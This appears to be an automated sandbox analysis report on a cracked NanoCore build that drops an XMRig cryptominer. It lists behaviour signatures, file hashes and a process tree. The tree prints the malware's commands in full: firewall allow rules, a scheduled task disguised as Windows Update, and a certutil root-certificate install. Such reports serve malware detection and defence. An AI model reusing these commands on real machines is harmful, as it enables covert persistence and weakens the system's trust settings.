Analysis
-
max time kernel
306s -
max time network
318s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
-
submitted
25-03-2023 21:55
General
-
Target
NanoCore 1.2.2.0_Fixed_Cracked By Alcatraz3222/NanoCorex.exe
-
Size
5.5MB
-
MD5
86e969198fa021717306f6e1fa91f548
-
SHA1
8ff9dc70c623824f91c75af4a4a57b62cea0f0b3
-
SHA256
5d66f49d642c092195beca3500408edd09409fefc65284ec3f69a8454dc3dfa7
-
SHA512
36d9d1a468575aa2a76c486a61fa430eae095f5ec24c75915523b758339d00844b5695665101740cce1c3cc61ed3bf8014d623a02feddfbd06cfa2db06761f0e
-
SSDEEP
98304:TJnZwQ8/VAQRxdsPKJ/lRM/oO3FX5Tz1m2HK1LtKfDAy9Yi7O+Kx:TJWQ8/GQDd3JjPOVXRzPHGL4fDAy9Yiq
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 37 IoCs
-
Modifies Windows Firewall 1 TTPs 2 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 2 IoCs
-
Modifies system executable filetype association 2 TTPs 2 IoCs
-
Registers COM server for autorun 1 TTPs 64 IoCs
-
Drops file in System32 directory 6 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies Internet Explorer settings 1 TTPs 2 IoCs
-
Modifies registry class 64 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of FindShellTrayWindow 4 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 35 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\NanoCore 1.2.2.0_Fixed_Cracked By Alcatraz3222\NanoCorex.exe"C:\Users\Admin\AppData\Local\Temp\NanoCore 1.2.2.0_Fixed_Cracked By Alcatraz3222\NanoCorex.exe"1⤵
- Checks computer location settings
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /End /TN "Microsoft\Windows\MUI\WindowsUpdate" & schtasks /End /TN "WindowsUpdate" & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /End /TN "Microsoft\Windows\MUI\WindowsUpdate"3⤵
-
C:\Windows\system32\schtasks.exeschtasks /End /TN "WindowsUpdate"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /Delete /TN "WindowsUpdate" /F & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "WindowsUpdate" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System" dir=out action=allow program="%windir%\SysWOW64\TiWorker.exe" enable=yes & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="System" dir=out action=allow program="C:\Windows\SysWOW64\TiWorker.exe" enable=yes3⤵
- Modifies Windows Firewall
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System" dir=in action=allow program="%windir%\SysWOW64\TiWorker.exe" enable=yes & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="System" dir=in action=allow program="C:\Windows\SysWOW64\TiWorker.exe" enable=yes3⤵
- Modifies Windows Firewall
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /Create /XML "%windir%\SysWOW64\MicrosoftWindows.xml" /TN "Microsoft\Windows\MUI\WindowsUpdate" /F & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /Create /XML "C:\Windows\SysWOW64\MicrosoftWindows.xml" /TN "Microsoft\Windows\MUI\WindowsUpdate" /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /Change /TN "Microsoft\Windows\MUI\WindowsUpdate" /TR "%windir%\SysWOW64\TiWorker.exe" & schtasks /Run /TN "Microsoft\Windows\MUI\WindowsUpdate" & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\MUI\WindowsUpdate" /TR "C:\Windows\SysWOW64\TiWorker.exe"3⤵
-
C:\Windows\system32\schtasks.exeschtasks /Run /TN "Microsoft\Windows\MUI\WindowsUpdate"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil –addstore –f root MicrosoftWindows.crt & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\certutil.execertutil –addstore –f root MicrosoftWindows.crt3⤵
-
C:\Users\Admin\AppData\Local\Temp\NanoCore 1.2.2.0_Fixed_Cracked By Alcatraz3222\NanoCore.exe"C:\Users\Admin\AppData\Local\Temp\NanoCore 1.2.2.0_Fixed_Cracked By Alcatraz3222\NanoCore.exe"2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\TiWorker.exeC:\Windows\SysWOW64\TiWorker.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 460 -p 4276 -ip 42761⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4276 -s 24761⤵
- Program crash
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"1⤵
- Modifies system executable filetype association
- Registers COM server for autorun
- Checks processor information in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.dbFilesize
28KB
MD5a246b23375817dd69f85d856c2be1030
SHA1f9ccdd770be1dd08663d6a428a4c1978d368215f
SHA256a61b4e3fdfc5fb22884d402dc7031738879b79541e1dfa909b99952d0b568176
SHA5124cc44396fee66638433408a6e5e69e51fb92d679c40d67cf70345564ae071e2c108dc67d54d4cf287888537722e60f186156efc8bf0ec8a41bceec6bfcdfb472
-
C:\Users\Admin\AppData\Local\Temp\MicrosoftWindows.crtFilesize
1KB
MD51bb617d3aab1dbe2ec2e4a90bf824846
SHA1bbe179f1bdc4466661da3638420e6ca862bd50ca
SHA2561bf4ce2aedc0cfb1365ab15c7e0c8c26b87890ad4008d56317b756b8745ff580
SHA512ed91750bec3aed806088c271e295550dac1c8cae91569f278d40fbd671b486e70cc9b28f7a9a70e9f340fbe8a038f1ed18f666de4246fc1d60e015e0dd3f1c52
-
C:\Users\Admin\AppData\Local\Temp\NanoCore 1.2.2.0_Fixed_Cracked By Alcatraz3222\NanoCore.exeFilesize
1.4MB
MD51728acc244115cbafd3b810277d2e321
SHA1be64732f46c8a26a5bbf9d7f69c7f031b2c5180b
SHA256ec359f50ca15395f273899c0ff7c0cd87ab5c2e23fdcfc6c72fedc0097161d4b
SHA5128c59fdd29181f28e5698de78adf63934632e644a87088400f1b7ab1653622e4bc3a4145094601211a2db4bcbd04ea5f1ac44129907fbb727fe24a1f3652c7034
-
C:\Users\Admin\AppData\Local\Temp\NanoCore 1.2.2.0_Fixed_Cracked By Alcatraz3222\NanoCore.exeFilesize
1.4MB
MD51728acc244115cbafd3b810277d2e321
SHA1be64732f46c8a26a5bbf9d7f69c7f031b2c5180b
SHA256ec359f50ca15395f273899c0ff7c0cd87ab5c2e23fdcfc6c72fedc0097161d4b
SHA5128c59fdd29181f28e5698de78adf63934632e644a87088400f1b7ab1653622e4bc3a4145094601211a2db4bcbd04ea5f1ac44129907fbb727fe24a1f3652c7034
-
C:\Users\Admin\AppData\Local\Temp\autA107.tmpFilesize
3.2MB
MD5ecede3c32ce83ff76ae584c938512c5a
SHA1090b15025e131cc03098f6f0d8fa5366bc5fa1f0
SHA256366f1e9f9c99aa81034bada3cc344f2fb5a74246e1d5851441244df1ecc9ae6d
SHA51261ca6075c8a2086d42b58698484afc0005645507474831cacafc10126f47c8f0cda10c1c215557f9391865b55b16ae881a593d7547cbad560b54369684b23d1d
-
C:\Users\Admin\AppData\Local\Temp\autAB7A.tmpFilesize
1KB
MD51bb617d3aab1dbe2ec2e4a90bf824846
SHA1bbe179f1bdc4466661da3638420e6ca862bd50ca
SHA2561bf4ce2aedc0cfb1365ab15c7e0c8c26b87890ad4008d56317b756b8745ff580
SHA512ed91750bec3aed806088c271e295550dac1c8cae91569f278d40fbd671b486e70cc9b28f7a9a70e9f340fbe8a038f1ed18f666de4246fc1d60e015e0dd3f1c52
-
C:\Windows\SysWOW64\MicrosoftWindows.xmlFilesize
4KB
MD5b1cbfcc7b7a5716a30b77f5dc5bb6135
SHA15c397ffd7a845b2fdf9e82ff73698784a91a2fb9
SHA25696f2ff4ddcadf6421071daa6cdda2ce866fb7b10d12cc1b20bd07cb131210430
SHA512d08516e7610e5a08d1c5c2d1cc5a22b1cd2d6b7c890f895caee0cf65577a1315d575d91a8f7f78ffc7bd0dd77b23ece46fadf58ba44257a115330a54a3ebfcf7
-
C:\Windows\SysWOW64\TiWorker.exeFilesize
3.2MB
MD5ecede3c32ce83ff76ae584c938512c5a
SHA1090b15025e131cc03098f6f0d8fa5366bc5fa1f0
SHA256366f1e9f9c99aa81034bada3cc344f2fb5a74246e1d5851441244df1ecc9ae6d
SHA51261ca6075c8a2086d42b58698484afc0005645507474831cacafc10126f47c8f0cda10c1c215557f9391865b55b16ae881a593d7547cbad560b54369684b23d1d
-
C:\Windows\SysWOW64\config.jsonFilesize
1011B
MD53da156f2d3307118a8e2c569be30bc87
SHA1335678ca235af3736677bd8039e25a6c1ee5efca
SHA256f86ab68eaddd22fbe679ea5ab9cc54775e74081beffd758b30776ba103f396eb
SHA51259748e02cc4b7f280471b411d6ca3c9986f4c12f84b039bae25269634fc825cde417fe46246f58538668c19cca91e698e31d9f32df69aad89e68423f86bb00c0
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\windows\syswow64\tiworker.exeFilesize
3.2MB
MD5ecede3c32ce83ff76ae584c938512c5a
SHA1090b15025e131cc03098f6f0d8fa5366bc5fa1f0
SHA256366f1e9f9c99aa81034bada3cc344f2fb5a74246e1d5851441244df1ecc9ae6d
SHA51261ca6075c8a2086d42b58698484afc0005645507474831cacafc10126f47c8f0cda10c1c215557f9391865b55b16ae881a593d7547cbad560b54369684b23d1d
-
memory/3664-328-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-197-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-169-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-171-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-164-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-334-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-177-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-333-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-162-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-332-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-181-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-331-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-329-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-302-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-327-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-326-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-194-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-325-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-324-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-170-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-159-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-307-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-306-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-305-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-304-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-303-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-206-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-207-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-208-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-209-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-210-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-212-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-213-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-215-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-216-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-158-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-231-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-300-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/3664-301-0x0000000000400000-0x0000000000DCB000-memory.dmpFilesize
9.8MB
-
memory/4620-175-0x00000000017A0000-0x00000000017B0000-memory.dmpFilesize
64KB
-
memory/4620-205-0x00000000017A0000-0x00000000017B0000-memory.dmpFilesize
64KB
-
memory/4620-204-0x00000000017A0000-0x00000000017B0000-memory.dmpFilesize
64KB
-
memory/4620-203-0x00000000017A0000-0x00000000017B0000-memory.dmpFilesize
64KB
-
memory/4620-200-0x00000000017A0000-0x00000000017B0000-memory.dmpFilesize
64KB
-
memory/4620-199-0x00000000017A0000-0x00000000017B0000-memory.dmpFilesize
64KB
-
memory/4620-198-0x00000000017A0000-0x00000000017B0000-memory.dmpFilesize
64KB
-
memory/4620-196-0x00000000017A0000-0x00000000017B0000-memory.dmpFilesize
64KB
-
memory/4620-195-0x00000000017A0000-0x00000000017B0000-memory.dmpFilesize
64KB
-
memory/4620-192-0x00000000017A0000-0x00000000017B0000-memory.dmpFilesize
64KB
-
memory/4620-191-0x00000000017A0000-0x00000000017B0000-memory.dmpFilesize
64KB
-
memory/4620-188-0x00000000017A0000-0x00000000017B0000-memory.dmpFilesize
64KB
-
memory/4620-182-0x00000000017A0000-0x00000000017B0000-memory.dmpFilesize
64KB
-
memory/4620-183-0x00000000017A0000-0x00000000017B0000-memory.dmpFilesize
64KB
-
memory/4620-180-0x00000000017A0000-0x00000000017B0000-memory.dmpFilesize
64KB
-
memory/4620-178-0x00000000017A0000-0x00000000017B0000-memory.dmpFilesize
64KB
-
memory/4620-176-0x0000000005600000-0x0000000005601000-memory.dmpFilesize
4KB